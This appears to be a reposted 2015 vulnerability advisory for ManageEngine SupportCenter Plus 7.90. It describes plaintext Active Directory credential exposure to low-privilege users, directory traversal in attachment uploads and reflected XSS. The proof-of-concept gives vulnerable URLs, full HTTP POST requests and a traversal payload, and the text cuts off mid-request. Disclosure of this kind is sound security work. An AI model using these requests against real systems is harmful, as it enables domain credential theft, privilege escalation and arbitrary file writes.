Document Title: =============== ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities References (Source): ==================== http://ift.tt/1SvmNhw Release Date: ============= 2015-06-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1501 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, the service contracts and in the process providing a superior customer experience. SupportCenter Plus is commonly deployed on internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk stuff (typically Active Directory integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is important to consider when evaluating the risk of the below vulnerabilities. (Copy of the Vendor Homepage: http://ift.tt/1JZDgZK ) Abstract Advisory Information: ============================== An indepndent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-27: Researcher Notification & Coordination (Alain Homewood) 2015-06-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Manage Engine Product: SupportCenter Plus - Web Application 7.90 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 Improper authentication disclosing password (Authenticated) Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessibly by Administrators. This functionality allows a low privilege user to: 1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory 2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records) A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains. Typical attack scenarios could include: 1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation). 2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar. Pre-requisites and considerations include: - In order to steal existing domain credentials it is necessary for Active Directory integration to have been setup. - In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this) - It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn`t displayed on the internet accessible login) 1.2 Directory traversal on file upload (Authenticated) Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories. Potential impacts of this vulnerability include: 1.) Remote code execution *** 2.) Denial of service 3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc) *** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment: 1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed 2.) The uploaded directory always appends an additional directory (named after the user`s ID) which prevents deployment of a packaged or unpackaged WAR file (or similar) Despite the above limitations I cannot con conclusively determine that code execution is not possible. 1.3 Reflected cross site scripting (Authenticated) Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus. Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do. Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector. Unsanitised user provided input in the `compAcct` parameter is echoed back to user during requests to /jsp/ResetADPwd.jsp. Unsanitised user provided input in the `redirectTo` parameter is echoed back to user during requests to /jsp/CacheScreenWidth.jsp. All authenticated users are vulnerable to these attack vectors. Proof of Concept (PoC): ======================= 1.1 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below. Manual steps to reproduce the vulnerability ... 1.) Set up a Active Directory domain 2.) Install SupportCenter Plus 3.) Login as an administrator and add a Windows domain and associated credentials 4.) Logout and login as a low privilege user (by default there is guest/guest account) 5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions (e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code) Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as low privilege user: http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP http://[VULNERABLE]/ImportADUsers.do Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this: POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1 Host: [VULNERABLE] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Referer: http://[VULNERABLE]:9090/AdminHome.do Content-Length: 181 Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description= Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this: POST /ImportADUsers.do HTTP/1.1 Host: [VULNERABLE] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[VULNERABLE]:9090/ImportADUsers.do Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 193 selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true 1.2 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below. Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request It is possible to manipulate the "module" parameters to traverse directories. Decompiled source code of the creation of the file path is shown below: String filePath1 = "Attachments" + filSep + module + filSep + userID1 Note that an additional directory (named after the user's ID) is always appended to file path. In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2. The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment. An example POST request is shown below: POST /workorder/Attachment.jsp?component=Request HTTP/1.1 Host: [VULNERABLE]:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536 Connection: keep-alive Content-Type: multipart/form-data; boundary
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment